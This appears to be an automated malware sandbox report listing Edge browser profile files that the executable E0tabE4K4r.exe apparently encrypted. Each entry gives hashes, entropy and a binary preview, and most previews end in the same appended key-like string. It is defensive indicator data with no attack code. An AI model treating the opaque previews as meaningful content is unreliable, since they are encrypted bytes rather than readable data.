                                                                                                                                                  SHA1:8F86B8E322E358DC7E060C5199EB435342849313
                                                                                                                                                  SHA-256:C4C0101BE139700E14D2E1773846AA1CB4174652FFC020BB9CAC30CD17667ED1
                                                                                                                                                  SHA-512:9B0C056F862AB1E7CF8BB6066C3D0FDFE70BE139803ACA2838EFEA9ACE23A43916BB31DB3631075DEB43EE28699EDDED7A4C09B97D050944E1FEB266DCF2BA62
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:(()=>.oF....4*..9...>.#r..:............E.........'.j.\.0_.].#..L..;\..U..`..Y...RO..[$.;..r.J..a...cz.n^+ .;.quu....Dh..,.).[..i..._~......t{.||B...fW8.c.5.....y.H.M...^.|..Z.....S...\YK..n....xk.3.S.."........f.P..&.....*..YJ#.'..-.aBV9....VqA.DSC>..K.d..6.&.ZRC.f.$.\.+;7...z.....o:Za..)3@%K;..Mok...J.6(.4..7c.Y..U'rtKN."....#&.wl..s;Q5...l`s..lI ....HR.E...ku....q.2^3A....A8eJr...z{(..J..'.0...>t..xy...2.-d..b....i..i...6..XN.44<.8....!T.a..Ai.*/.Od.&..Cy#.z..)..s..P.......>3.C.....]..q.[=..%...m?..o....t\.n...7*.SX8......bQ..V,P...6..x.a..-...2.."..`.....=.D..3i...V.....S...L-.Gr.V...."&.9.1..V.GZ..Y)./.u....}(.^..../g{iO.@....m..`##.{.k.IT..Y9.! . {......6t;.,g...F........6...4.......*...~.P?.9.<....e..T..6....R.1...h#v.%:.#~....l....$.cr...=.S.I.JM...i...V0.u ..q.ll+...AZ.a..s.f.....A..{.s=$....@..*...P.9.?`......3kW=Q...$1qb....'Q..t...I...iT(.....e..$,.#.Q. .~.+.%/...N5Ui.upi]..;7....Ty.p...~5.K...6....X.t....K.W2.o@..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0\manifest.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1296
                                                                                                                                                  Entropy (8bit):7.855116411126232
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:x5Ags8X2X8jDMF47C/EXCUVemntOzJcZBeWxtW4hkohH2bD:x5AgR/P6/ipVemnnBHxoYkoGD
                                                                                                                                                  MD5:AA3E26227928E94B128D78AA0C24CD88
                                                                                                                                                  SHA1:B23E630833E1BCD678992CE3CA86D9933C256F9A
                                                                                                                                                  SHA-256:79461E362F304D7BEE2C2D6D6CCCF7E70C636139E352FD0F67A669D207BA3C70
                                                                                                                                                  SHA-512:8413B453E3B147A574191C146F3CBB62845B3E264991843CC63DBC978B9A5CF98D1CF91724AC1130916EB3D4DB76F5B20B84994B7EBE597671C4C9CDD00FB305
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.. ..}!.x.B=.U..f..DCn.fV$.8i....).....a95...........Ie....g5.!^..W..D5q.).....9jC$....W.....o..I..`...l.OB./oK...+.....F.d.....%.....+M.<M.-..P.......|.d. .]..#L..+P .0.C........(....>......J..S..f..i.v.K...e.l|..D....xW..~%....s.mL..)c.{.Fk...E.!.......4.S.B.lmqN.........v.{.*.:.J.....1.......9.......]=...h....x.W.4....L=......vG....m....T....:....oZh}Hr...x....Ie..f"../..3$H..(.H;.f.sy...e..I.R.+p..'........=....Z....7..)j.....\-........:.>(...Z+.........5.9,....U#..K...7.$H...._..!..>...[$..Ec.3...ZG..aVl.B.y.......:I...#.;..{. t#...../..`.l09.S.'....e..f)`-.....0..D.3g..`..lzx.O_.Ft.e...5[....x]d...M.+..nE.r.Ku$.^..x.Ao.H"..'74...~..D.71qJsT..@.[..oI.*.p(|..#..T.G...'}.&J.rN.]*?Le..q...."..2k.".#...Z.?p..x+pUQ....5'..Vqt.F...]....1..\...T.....D.].0t..*,..y..@}F@..6....C......w...........4C....*.1.....\h~.$R......7..Lf:..-_6VJ.g.vc.+R>.-:....`2..HC....GJH..9..e@Pu..\..tb......2......Q.f..c.Y|-...B.....lX.N..S.....|..)S..#.fK.......]..&.....i

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):668
                                                                                                                                                  Entropy (8bit):7.685871967981493
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kCGXbRQMOGKEIHKOXTjX7+cA+O72/NPyZCyPikM1OC5SUdNcii9a:+QMOGKESNXT2+ioMMkMEV2bD
                                                                                                                                                  MD5:A1EAAE4DFEB4518D34980C0698340DA1
                                                                                                                                                  SHA1:54E0143B9F13DCB7B015EB44F77217EFA709BB04
                                                                                                                                                  SHA-256:0F2D259C3809EA48A8990A98B47DCFB3EBC23A88906845FB9CE9C007E7F023C1
                                                                                                                                                  SHA-512:C0DDC090529118CE25A9E2907F51807CAB62E1758401BDCAB3D69EAF23D59601666DD5E72F9B33C3A5AEA0E156AC8A76E5470A7413EC56893B41704D8158D6B8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/....9..j..`../...p....../9.]..\.r.R.{K.sq.$.}0}..c..<>.....N,Eny.)%A.Bu.[.).l[...V.gc^...s..#^......t.<s0....@......`.....d.....:....m.HG/~6..t:.%uV.f.l...wRM....r.(........=..G.....h.....(.kP...s..V9u.C.....M`Lm..(+.~.......a..6)...7$..d.x.uA..X...)...E....-..VV|...T.vz..1.....a.Ef..."dD.^}\ER.5..G5e._...'.=U.uu.O..K...U.'...:....$..Q../.7[1R.7..pw(^z4SV.IsM.3vN.&..R.|..aY...:O.4.. ...X........S..o......}.y...$.-..$........Y9x......1a.....N\...W.....j./...$.....q...e.9..t..p.......3..t..1.}J.t.B..U...9^;4."..b.>.jF5.,....d.r..*.Q&..+.......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\26b0893d-54a4-4f25-b80e-4447c7362ddf.tmp

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1953
                                                                                                                                                  Entropy (8bit):7.897401975810314
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:YlnriQMHH9AlLvfTO8Ii59OxsJr2b7G2MeM6xcaU9s8ZFm0nD:MQHdGDfT3X32u2MeM6DU9s8ZFme
                                                                                                                                                  MD5:96265578EFC157CD6D091DB3D034B75D
                                                                                                                                                  SHA1:D0AF392070E2FF971441F23E35A2AD9F57481B5B
                                                                                                                                                  SHA-256:87D7325981EC6123C95A523D07A73AD644A816A57FE7A42A0F0170D6792F044F
                                                                                                                                                  SHA-512:DA6608C01EFCC6979511678692EA17DF3A3AD8F1B7D3DDB7C38592F1C51C0D6D8B580D943AF76533ABE7650DC786A37CFB0332AFAF233F0775BDDFBC01244A8A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{"net...1.v..G!V.....VU8LoE);w(z.Z..a.(.j." +.RWZ...e,.gr..{...v.Q...Flre....a..R...C.....J{G..yhS..}.E....(.|..B.<f.....%..1e.....2./V...B....<.X.......UIT.....rr.\..G......40].r.3.....2#<.......'.2...=.9H.=......._.[V:a.....=...,i.n.....!.$`...........d...... 0.q..H..>dz/wB.a}..I.*..0..r....;....be.|3..r....."..@......Uy.h-e.K....=%./~dq.'Y#....I. ...G.~........f@.:........I.n..af.....FD.g_..@MU.L.:/..2.~.....:.a....0.........x......O(....Ix.?.... .z.......0.......:7...8<.....qJ.!.3....y-..f...P..........U.;...v%CG.:0...qp....#..[...g,|(...3s..........a...7...3x......5.jW.I.Zq.;@.q.4....|..Np1......y....|.\.ya.~.....$"..v`K..1<..q..38v3Q.\C|...N..<.$..j.........p2..BN*K$q-S.rs..D.v.8.~f.].[9.E...4.........rMT..tp...../...J7.X.SJ/@N4..(_Kn..r.\.......7%...6.\.6.z.m..<......0"o.5......Y...I..d.. ...0j...4&..x.X|.`r.L.#.O......A....._..A.X..t..r...)6......tw.g...K?.{#.O.u|.....N.*L..>.Q..........v}m.!.....l.0..)<.....G.\`..a.h.8J...xG

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):452
                                                                                                                                                  Entropy (8bit):7.506381144408381
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:SizPbZEWHQRBtQE05SjH0cnsD+cbOlDTWSUdNcii9a:zTZjHQVQVSjH0cnfoQV2bD
                                                                                                                                                  MD5:666F6A3174ACE79D4EE11D863801BC04
                                                                                                                                                  SHA1:6A5E71A2032FA9DB6141006819E83DBF229B73B0
                                                                                                                                                  SHA-256:F530C48943E9FB6E9655A014916E786234D2F16D75E11C700D91D82B22D5182E
                                                                                                                                                  SHA-512:8305A352A835E652C8A4FBB501E9DA38CF8EC3226AF656B0FC64F8D86274587C72C7766A683838E2A7AE7F5F4B6D8FF1D29AAB759FE80AB5E55215BD82C7C702
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:*...#tS_../...#......i..r..._......u........yj....P.h)..c.xW..J..8.~e.l_mSZ....'...Gfq..~H.,.eS...PV._c2Tfm*el..r.3...>.J.P....*.R.w.....L....v.6z.>.uw....u....."..).f.+..M....!..7l...ac.h.@..9}.!.%JV..".')\.......MX.'...i...Re~....cI....L....7{z..K......%....t.2Z.....=T...Y.f.w.B..:..~t..l....p...,.9'.p....r.aX.*.o.N...A.a..A.y............w;......[.~u.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):684
                                                                                                                                                  Entropy (8bit):7.6675506484041644
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kx0feIvM/YKahszgvjSkDTLQjwA49FdrpkROhNmkBtMDt+qTzMoX8A4A7mVSUdNX:/f3KJEvj1PQjwA49Fdr/CkBqvT4oX8AA
                                                                                                                                                  MD5:F5A4169CF2CEBFD0270C189911824C07
                                                                                                                                                  SHA1:9C3368D99E911B4538972C45442F9E72B566BCC2
                                                                                                                                                  SHA-256:B956D950F169DA12BD9E92026585AEBE1683A9DFDBAB848399EF53DF83F0858A
                                                                                                                                                  SHA-512:D08322AAE7F0A36F05C57DD45829DB83F6ABD091433D6D35542166105EABB974C4CB25DC6C6B7CF867CBBF032C174DB36C74CBB07CDFDB8B9C150618A27080C6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/w.7R*...q.!.........T....(.a%T%uY..G.2+r*..Rs.g.l..hS.B+..]..(=.y7i...../.[.%...(.RHQ..?....+...7...'[O}<Wr:^di..pVq.S...X..3&....,...a..i....B,..ka.X....P.[AP..d.;..h...kis...+d.........5.=r...8...ER...Ni..,..]....P .-.I.g..8..F...b.8.B....}....yq..j..|X.t..k.?...U.Hc..........K...r..7p...-.....1....>Pp........KF7gk..B.2.I..n.A..."...;.8..........su.X...C.....Q2....H._...uA.P3.a.e(x]....5...$.~..\<...a?..i..9...W-.@:.Rd..s:(..h...W..~...q...|V....N-...z....c....%.g.FE%K...mK......u.).P.1..3[....cn...G....p.?...k..h\X4<..k..L..._D?........^.v>AM.?...kTYQV=.T.;.G.fue-.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):380
                                                                                                                                                  Entropy (8bit):7.362306327203732
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:qWpwoFv1T9JVIYM6H8+F7sgjJRNAiByIyh/uXecrY/yn/eZ1lnIS1WdNcii96Z:5nxJV7/3JPNBrMaeJyndSUdNcii9a
                                                                                                                                                  MD5:8A43E38FA0AFF3D4B9A41E2E2DF80F9B
                                                                                                                                                  SHA1:781857F6F7A297F66ABD4DF3D81274D57B8BAF01
                                                                                                                                                  SHA-256:E6F0D70D9779E56EFF0285BAA835D410CE0755ED47859848CE7A3B30F27669BD
                                                                                                                                                  SHA-512:286A5158710EA64236F700655C83E810DAEB02A6FE0474B9478C097F66B38C127909110D9923E780A5B0F69BB738E0DAA4400BE394C2D9D84F53D26C30AB2FBB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...n'K..y...o..[...f`...Z...0r-..(..E.l..[jM_.`D..E......&..j&f....%\}2Q...A.c.)A./...i)B..[....j....;... $..Z....C...s...Q4.F.kcV...z..i...6..........$v....t. g4.d..s.PD..Q......61.H.......A...*.....d.'=.L.f.c..uT]....z.h...l.XB.....j.N...#.K.|B7.^...._.I....B .2#..$.T.0.K.x.z.6./.OmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):657
                                                                                                                                                  Entropy (8bit):7.632074055217295
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kiwja/u63YX9y2t4EpaKfk0elAAhJlmJ6jNh54criZwynT+Aw43SUdNcii9a:Xwja/f3QXKXKfLAfs66Ui64/M2bD
                                                                                                                                                  MD5:0D109FB0E394425159FED95017BB376C
                                                                                                                                                  SHA1:430B2F3E607BEBBE06C71315BF40C588723D0CE2
                                                                                                                                                  SHA-256:F4E3675322C3B6500D377D2ED931AD841816634F88758CC909C13CBEEBFD241C
                                                                                                                                                  SHA-512:FD506268D869D6841382523363CEE8324622F83603A3163975222809E077D3638013B593FF9C89052F52AC546F23C15EEF5C19C29470B6B893EFBDAE8067870A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/.Ms9....x.H....D.7d..H..g.^...<`j....7.....5~.-.Ez.R..D.A!2....SWNKp=.E.N&.t.5~.5.Ty*....%..n<h.I..`..@..G.Z.......b..uwpc4.5.#a..........u.@/.i...m..C..Dc.q..w..>E.?.l....0.9B.......+........di.%..31.|m..P.{....6..I...,.i;...!.....-"....^2.3,R.,.(......F.VbU|p..K..j.....DST?..m#....H...m..C.1X.:/.?{!.a,8.r..u.i`I'$..C....m....#.c.....t^a...D..Z.,...F .F..R...#...%_HVA.Hs.L..~..M..2v../..&..lYUC.....:n.S.m..jP.f>K.A...i..s........t.7..#Z..("]X...ctu...Y..>..q..%..0s.<..k...a.'..*..~D.....0..Bd....?.F;.P..9..V....D..=aP90...%?..7.1.E(..e..6.CU....R.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):641
                                                                                                                                                  Entropy (8bit):7.670324080006304
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:J4TwhqRB9das7/9pKZYwLupHdqjccDN0Ck4pMSUdNcii9a:+TwSTvQx29qjHYgT2bD
                                                                                                                                                  MD5:F34F989BBB00F14D43EFD699DA5131A1
                                                                                                                                                  SHA1:334FBD3CFB31A26D35A320DA737ADE84348AADE8
                                                                                                                                                  SHA-256:B35D93ADC5F3ADDDB038C58535D1005E14247DCA741B482B9994E4289E6E73D0
                                                                                                                                                  SHA-512:AE44E1E0B48EDC21EB6709B946809CEF0C169B27E7232AD6550D59314B882CAA41959886ED80D1987DD7560E43FE5E9A9DEEA851D3F2D56C838E0B0820F8EE87
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:A..r......`.p...5n.QBN../XR......._...5.{......W2#"l9.(.V..-..C&0...b..K..(.....He.a.`.(Y...(1....+.7.V..Q.|?Aru.......-?.....;.N1..[..|...q..9^.....}E.=;..P Jn.......(...6. }.........j ...TK.)f....N....S2..-g..c..."..%.;&..N6,...m.S......?|..*.a...xv...K.............[.....q'(.oK8...p...N.Y".g.{l...Z\.........d.5.L.:..t:B.w.Y....|.T.....&.HI<...<../l..D...j...j.y..+....o.bR.S...H.....D..t.M.>..+.~.p!........gX.B...p`0.>._Z.l$.YeZ.....1}...|...L.{l.+....@9...K.L!...z4....?..........HP..x...S$.tUU.....y~S6@..K...B...j...!.8omMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1053
                                                                                                                                                  Entropy (8bit):7.812503607955214
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:GTsWoIlwxFygcBUPeVFehDaWiymU0nz5mUa8EtoVIkLcEAK2bD:CnFgcBDje1j8xWpkLcEcD
                                                                                                                                                  MD5:0EC692A9AF9FC7C8721540B8E441A329
                                                                                                                                                  SHA1:B0B24B1EC057CAC31B7588694AF9182C2896397E
                                                                                                                                                  SHA-256:DD8F9DEBD57387139CF51A427438F67A2FA6C49CA7892AA8FB7060387B0B6B76
                                                                                                                                                  SHA-512:71D4BADB5DEA3744E27F30AA526388FE305760C9596D71431AB666C3624941E487E80D68E0CB15BA2667AD6229AA239BB7DE72A5E08050C33A3A4ABC213A14A5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.h.6....'...z..A..E...1.oB&*....v.o.n.u.u..]7..t.%.H.x1.<...|.d3.9.p.FVD....l..[.k`f..X....C2...(#.k}X...U...tL.Y.8..P`u.B...h;w.~Gj?(.^...Z.(..D..0..R.L..^......|l..s.#1<......++..~..z.w.n.s.=.1.v.3C..s..!....)O.^0.yE f..........;....Y....._s.R..o:.h7Y..xf.2....r..aN\]6.A.....c.!y...q..W.l.....?....c......"A.4.E..R......X1u..?".2j.....%~..*7..}z..S=.D.S.jF.2.;..).....8.k........s#A.Z....!..........p.b>4......(.O...c.J..S..}...?.b)..uN.AM.dD....~....j..w...h>.2.Z.....")...=......c.A....m..I.....S..b{m...b9.YWl..v.o..A..lV:.......\.|.....I...D.E%.r....D..Z.;".L.k...^.7..U$...Ds....M;.K^!...U,..L.O.K.'....X.T......K.T.....=...Flo6..&.6...V..}.....oO.)|S.bc..2N..z.....1....].g/...b.4.VVk.m..Q+.j..$i._..u..A7:..O....z.:.....89h...}..G...Zn.`..x2..p..6..XG....*.....O\C$.......;k......b.7....LX..9. ]..r50M..c.....g..... ..x..z......F......w:o..]f.9K.K.....(.(0...........1.G.]q..l...st..6'3\.] ....x....?....mMsRxMUuXypapZbGOAfxD9pcz

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):674
                                                                                                                                                  Entropy (8bit):7.699084968880952
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:kzmnDwK9exhPE7OwI3+b8yAVGiku4KylIJV2aksgUetl1RSUdNcii9a:PbeHEy+b8xp4KyJak7tlu2bD
                                                                                                                                                  MD5:BDB9A35F719015284E7D896ED1B799A6
                                                                                                                                                  SHA1:93006AF59F3CE05AA375B128276DA1A248CE3724
                                                                                                                                                  SHA-256:E699C095544B9DDA2212CE6905B7D8AD0B38A33C96868384D3EBCF29FD335A1A
                                                                                                                                                  SHA-512:81E244EE33A41C8E9E01D80F2C3FE9B71A92193C27CBA681F8D78070E2EF03731A3AB603BA401B8D82D3966610A07FAD1BFB0E1F93F3E65C653172169DD5C945
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:2023/;.K......-.$+......*.<...w..S.m.&l. o;..cO-.q.x}.....*..(>...V.U....p.....3.L~l|.H.....a.."...kd..I)p.X...4.d...M..L.J..8.F....[..]..z%..U..HN;...^.n...M...B..>iE(Mt....w...Z.t]RQ.@...g..2.asg..].....f...K..1h........a\........t...)....Je.....6.....D......._. .........N..W....,.{9....(H.B./k...L.._..f...f.8....us......zW.X.....B...:....E.tG...F'...1%...R..?.e.f..'.Fl.......`,"...F...;..e.S./C1.<...O........G../...^*.8..f...ji.Z...I.)..b......(|.yMr....?..".o..-..v..z..M....].HRVY...I?/.B}..2..\..C5.V 36..lJ.y\..X.....M.......qFX.S@k...tS.C.au.y).......&.MmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):80530
                                                                                                                                                  Entropy (8bit):7.997507747823386
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:YRNo1t+y1RZbNRfu8ZE/jOsBns4zHx11iCFJZT+5B4fYFhQZOaKC/Jtn6QcNASoz:8YdCeE/isJ3JZT+522hQb6QcNRY
                                                                                                                                                  MD5:8AA5E2887A45BE1C936822130AB175C6
                                                                                                                                                  SHA1:8EA332AD8AE477FB7A53F32FEFF81738CD2814E2
                                                                                                                                                  SHA-256:265C30F4FC240E4F5B3C3847F7DE0E9F6FD71D9A8F0C52A9E69488789690C64B
                                                                                                                                                  SHA-512:64A1A38FA3BDBF73FC56D59ED1818937E8F52D94FFF9BB0F81D02719B6E6AA28E4A4EFDFD289BE5F7547F58A6F0BD6D504F2E660F6E01B96859AF3665811EF4A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:ewogI.09......W=ZR..r.?D..\R..r......S'..X..6}7... 2....$a..........Z.SK.Rs.z....i..Q5H .....I..W.....p...=....d6%..Wh.f..0t...1.*ts.0...`...e.<...}.S.....~U.4.,L.:..C.@...8K.I...y.f... ......E.X|0TY.. ..>.\....X.b5.m.N...C.......In..W...0.KXBL.[.+.=..}.mH3...4...:N).Es,/.O.=.w.n...b.....~...q.#D.w..e2J]`.-....Y..x.)vA..$..F/\.g...\.3."zG....../2.pi..H7.._.+1...4Df...+j=..q..........c..Q...u.lO...b..9F.t..^O..9.........R...Y........P.,b+..[.C...-;Q'.LvX.7....p%....'...k......z.3._;..n.wb..z.$.@.....E*.'L7.uwq|...XxT...l#.|^....p..FEgH^..o.U.0..W...No....?M.....|...gt.~.o.(.i&..<.M...c(WV*.v.../i...V...7...&.-QPN..T...G..V.A.*.x....Ex...%pI8[\S%l[...9...)...m..^ [...Dd"H..m...I....<........y._....].[.W.......*...l.eP.c.<....&S..P.+...^........`......[4.j...f..4..2..i4WS..!.<i ~....1.....6.........#.O...=B..TM.(......i2n..]...k.....M!+......@..v...i............#..C_......)V..E6.G..By...L.R:... .{..m.y..R.Fj...~.u..R'.S....Z".b.|..iW....PAN

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\manifest.fingerprint

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):400
                                                                                                                                                  Entropy (8bit):7.370383816058606
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:gUQUQWfRuslaLwIhyl6LjaPKYErjdDSUdNcii9a:gUfQWfRus0LwIhyleKvkdO2bD
                                                                                                                                                  MD5:EF3D96C221C0D1E3A4D88C8370D6800A
                                                                                                                                                  SHA1:3021EF8B689AB4D7F2B35579D929DB41BD0A601E
                                                                                                                                                  SHA-256:9F478F132A47AC352D586C010B3430E733EF28A4B79D0E1195D5012DEE3F6A90
                                                                                                                                                  SHA-512:5415871646CBC5AF9870D6948E0A07C6B0E19EC326D118169067539FBA4BC8E88D4C44D35642E88FBE525A4F0B59BA6C6546F57280F307F1E754D975664B8B6D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1.558."S-H.>.!Y. h..F...........0.i.h..P.DlH....s.....@.-.........oMt.@JA......L....J.o....2.*.C..].....:.3s..B..T.%.....].^BbtZPzl...q.........s..W..]...?T..OhT.?(...Cq9.;.J..i.b.k....lh..E.Y..J'..e..$FM.2q@.ek.o$.4.F. .[..N%g.}n.......$..5...X...O9....$...Q.l.....F;Nq.}.y......A..%Y:..e..../..)....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\manifest.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):387
                                                                                                                                                  Entropy (8bit):7.331876877549201
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:YxavGzL/jjqaDoGWBspgkYSN3CVU9tweFSUdNcii9a:YtzLrGaDoGWaHYSUK9tE2bD
                                                                                                                                                  MD5:DB65DB8CE34B2C31A6F81948B135F014
                                                                                                                                                  SHA1:2ACA7B0A0A02629013DE42A3B238B4A54017801B
                                                                                                                                                  SHA-256:513A9A7C4FE26B98CEB31CB061B454953DF6C56F51F37BDDF5FC53AAB98A3835
                                                                                                                                                  SHA-512:590CB0B19E2D7F97A2C802C3D2F88D14E3181317E4657705C0E8E8670D28DBF721D86DF085CECD9535C4487AC6E7E92CF31B18CC65954182D1976E0D672502C0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{"nam8..M.m.L..I}D..z^.\.>"W..D..R{-...^...g......u.oO7.s....S..c..rz.@*.xf..|4......L}..|.$~...?9....#..4.s.........>.j.r.(!Ei.dGs..%.k.......|.C..Q... .....!..t..=..B..=...d........(x7+...c.,7E.....nD.c.h....b.....aQ...i..)r...=HN....y.4~..s.B F..,....^..../..C(..1...9...[u..ro)k.o.....9.+F...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20\InputExtractor.js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11901
                                                                                                                                                  Entropy (8bit):7.983545258465069
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:3WMl0qHn5cmTkXDxkfwFW9wlcX8ADQSR+vfPcepRs/WKf2VXs+ujFKo3lw7:3RltZcmTqxkfQW9wSX8+NqP/s/WKuVXD
                                                                                                                                                  MD5:7278594C5816D2A4B630006887F3E548
                                                                                                                                                  SHA1:7DF9DF65646B23353CEEBC08753076D70AC176BE
                                                                                                                                                  SHA-256:5B0060540D63E4C389DEFADFF9A693E62AE4BD3F5C9390B2E09F424A06AB3CA5
                                                                                                                                                  SHA-512:1BDEC351891133968EDD025B8FD4C12656DA16F1D135AC7211B71BF72DF0858BBD2E290603C00955C0B801C890D77962E2A52072481FE66E1B652789CD1A969F
                                                                                                                                                  Malicious:false
